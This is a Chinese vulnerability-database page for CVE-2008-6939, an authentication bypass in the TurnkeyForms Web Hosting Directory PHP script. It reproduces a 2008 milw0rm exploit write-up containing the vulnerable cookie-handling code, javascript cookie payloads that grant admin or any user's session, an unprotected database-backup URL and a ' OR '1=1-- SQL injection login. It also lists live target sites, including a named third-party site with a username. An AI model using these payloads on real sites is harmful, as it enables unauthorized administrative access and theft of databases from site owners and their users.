TurnkeyForms 虚拟主机目录 认证绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116725 漏洞类型 授权问题
发布时间 2008-11-12 更新时间 2009-08-12
CVE编号 CVE-2008-6939 CNNVD-ID CNNVD-200908-105
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7107
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200908-105
|漏洞详情
TurnkeyForms虚拟主机目录存在认证绕过漏洞。远程攻击者可以通过(1)通过设置admcookie到1取得管理特权,或(2)通过设置登陆cookie到目标用户名来获得特权。
|漏洞EXP
==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\

==============================================================================
	Turnkeyforms Web Hosting Directory Multiple Vulnerabilities
==============================================================================

	[»] Script:             [ Turnkeyforms Web Hosting Directory ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://www.turnkeyforms.com/web-hosting-directory.html ]
	[»] Type:               [ Commercial ]
	[»] Report-Date:        [ 12.11.2008 ]
	[»] Founder:            [ G4N0K <mail.ganok[at]gmail.com> ]


===[ DTLZ ]===
	
	[0] Insecure Cookie Handling
		
		#	if ($_COOKIE['adm'] == 1)
		#	{
		#		if ($request[1] == 'logout')
		#		{
		#			setcookie ("adm", "0");
		#			java_redirect($config['base_url']."admin/?".time());
		#		}
		#		$t->assign('logged', 1);
		#	}
		#	else {
		#		if ($request[1] == 'login' && $vars['passwd'] == $config['WebInterfacePassword'])
		#		{
		#			setcookie ("adm", "1");
		#			java_redirect($config['base_url']."admin/?".time());
		#		}
		#		$t->assign('logged', 0);
		#	}
		
		[!] admin Auth bypass, panel => http://localhost/[paht]/admin/
		[»] javascript:document.cookie = "adm=1";
		
		[!] users Auth bypass
		[»] javascript:document.cookie = "logged=[username]";
			javascript:document.cookie = "logged=g4n0k";
		
	
	
	[1] Arbitrary Database Backup
		
		[!] we can download a Backup of Database.
		[»]	http://localhost/[paht]/admin/backup/db
	

	
	[2] SQLi Auth Bypass
		
		[»] Username : [a_valid_username]
		[»]	Password : ' OR '1=1--
		

===[ LIVE ]===

	[»] http://www.webhosting-directory.demo.turnkeyforms.com/admin/
	[»] http://www.webhosting-directory.demo.turnkeyforms.com/admin/backup/db
	
	[»] http://tophostingdirectory.com
		username: ideas
		password: ' OR '1=1--
		
		javascript:document.cookie = "logged=ideas";

		
		
	
===[ Greetz ]===

	[»] ALLAH
	[»] Tornado2800 <Tornado2800[at]gmail.com>
	[»] Hussain-X <darkangel_g85[at]yahoo.com>

	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
	//ALLAH,forgimme...

===============================================================================
exit();
===============================================================================

# milw0rm.com [2008-11-12]
|参考资料

来源:XF
名称:webhostingdirectory-cookie-security-bypass(46586)
链接:http://xforce.iss.net/xforce/xfdb/46586
来源:VUPEN
名称:ADV-2008-3143
链接:http://www.vupen.com/english/advisories/2008/3143
来源:BID
名称:32283
链接:http://www.securityfocus.com/bid/32283
来源:MILW0RM
名称:7107
链接:http://www.milw0rm.com/exploits/7107
来源:SECUNIA
名称:32644
链接:http://secunia.com/advisories/32644
来源:OSVDB
名称:49838
链接:http://osvdb.org/49838